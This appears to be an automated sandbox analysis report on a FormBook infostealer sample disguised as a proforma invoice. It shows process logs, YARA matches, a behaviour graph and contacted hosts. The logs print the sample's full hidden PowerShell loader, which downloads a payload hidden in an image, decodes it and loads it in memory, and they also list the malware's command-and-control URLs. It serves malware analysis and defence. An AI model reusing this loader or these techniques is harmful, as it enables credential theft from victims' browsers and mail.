gtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('wbugp6qysf58ija!=yekhtua&21112%08168c3c4f36f6e4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('wbugp6qysf58ija!=yekhtua&21112%08168c3c4f36f6e4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }" Jump to behavior
Source: explorer.exe, 00000006.00000002.2934424185.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2931305146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_000E1975 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 8_2_000E1975
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\colorcpl.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428347 Sample: Signed Proforma Invoice 364... Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 53 www.xasvcd.xyz 2->53 55 paste.ee 2->55 57 14 other IPs or domains 2->57 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for URL or domain 2->81 87 13 other signatures 2->87 13 wscript.exe 14 2->13         started        signatures3 83 Performs DNS queries to domains with low reputation 53->83 85 Connects to a pastebin service (likely for C&C) 55->85 process4 dnsIp5 63 paste.ee 172.67.187.200, 443, 49730 CLOUDFLARENETUS United States 13->63 113 System process connects to network (likely due to code injection or exploit) 13->113 115 VBScript performs obfuscated calls to suspicious functions 13->115 117 Suspicious powershell command line found 13->117 119 5 other signatures 13->119 17 powershell.exe 7 13->17         started        signatures6 process7 signatures8 73 Suspicious powershell command line found 17->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 17->75 20 powershell.exe 14 15 17->20         started        24 conhost.exe 17->24         started        process9 dnsIp10 59 uploaddeimagens.com.br 104.21.45.138, 443, 49731, 49732 CLOUDFLARENETUS United States 20->59 61 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49733 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->61 97 Writes to foreign memory regions 20->97 99 Injects a PE file into a foreign processes 20->99 26 MSBuild.exe 20->26         started        29 MSBuild.exe 20->29         started        signatures11 process12 signatures13 103 Modifies the context of a thread in another process (thread injection) 26->103 105 Maps a DLL or memory area into another process 26->105 107 Sample uses process hollowing technique 26->107 109 Queues an APC in another process (thread injection) 26->109 31 explorer.exe 30 1 26->31 injected 111 Tries to detect virtualization through RDTSC time measurements 29->111 process14 dnsIp15 65 www.xasvcd.xyz 203.161.57.217, 49743, 80 VNPT-AS-VNVNPTCorpVN Malaysia 31->65 67 www.msaway.com 217.160.0.95, 49740, 49742, 80 ONEANDONE-ASBrauerstrasse48DE Germany 31->67 69 lunazone.us 3.33.130.190, 49744, 80 AMAZONEXPANSIONGB United States 31->69 71 System process connects to network (likely due to code injection or exploit) 31->71 35 colorcpl.exe 18 31->35         started        signatures16 process17 file18 47 C:\Users\user\AppData\...\J4Llogrv.ini, data 35->47 dropped 49 C:\Users\user\AppData\...\J4Llogri.ini, data 35->49 dropped 89 Detected FormBook malware 35->89 91 Tries to steal Mail credentials (via file / registry access) 35->91 93 Tries to harvest and steal browser information (history, passwords, etc) 35->93 95 5 other signatures 35->95 39 cmd.exe 2 35->39         started        43 firefox.exe 35->43         started        signatures19 process20 file21 51 C:\Users\user\AppData\Local\Temp\DB1, SQLite 39->51 dropped 101 Tries to harvest and steal browser information (history, passwords, etc) 39->101 45 conhost.exe 39->45         started        signatures22 process23
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.187.200
 paste.ee United States
13335 CLOUDFLARENETUS false
13.107.139.11
 dual-spov-0006.spov-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.21.45.138
 uploaddeimagens.com.br United States
13335 CLOUDFLARENETUS true
203.161.57.217
 www.xasvcd.xyz Malaysia
45899 VNPT-AS-VNVNPTCorpVN true
3.33.130.190
 lunazone.us United States
8987 AMAZONEXPANSIONGB true
217.160.0.95
 www.msaway.com Germany
8560 ONEANDONE-ASBrauerstrasse48DE true

Contacted Domains

Name IP Active
lunazone.us 3.33.130.190 true
dual-spov-0006.spov-msedge.net 13.107.139.11 true
bg.microsoft.map.fastly.net 199.232.210.172 true
www.msaway.com 217.160.0.95 true
paste.ee 172.67.187.200 true
uploaddeimagens.com.br 104.21.45.138 true
www.xasvcd.xyz 203.161.57.217 true
fp2e7a.wpc.phicdn.net 192.229.211.108 true
www.lunazone.us unknown unknown
onedrive.live.com unknown unknown
htdgia.db.files.1drv.com unknown unknown
www.shakishaskakes.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.lunazone.us/m07a/ true
    		low
    https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820 true
      		unknown
      http://www.msaway.com/m07a/ true
        		unknown
        http://www.xasvcd.xyz/m07a/ true
          		unknown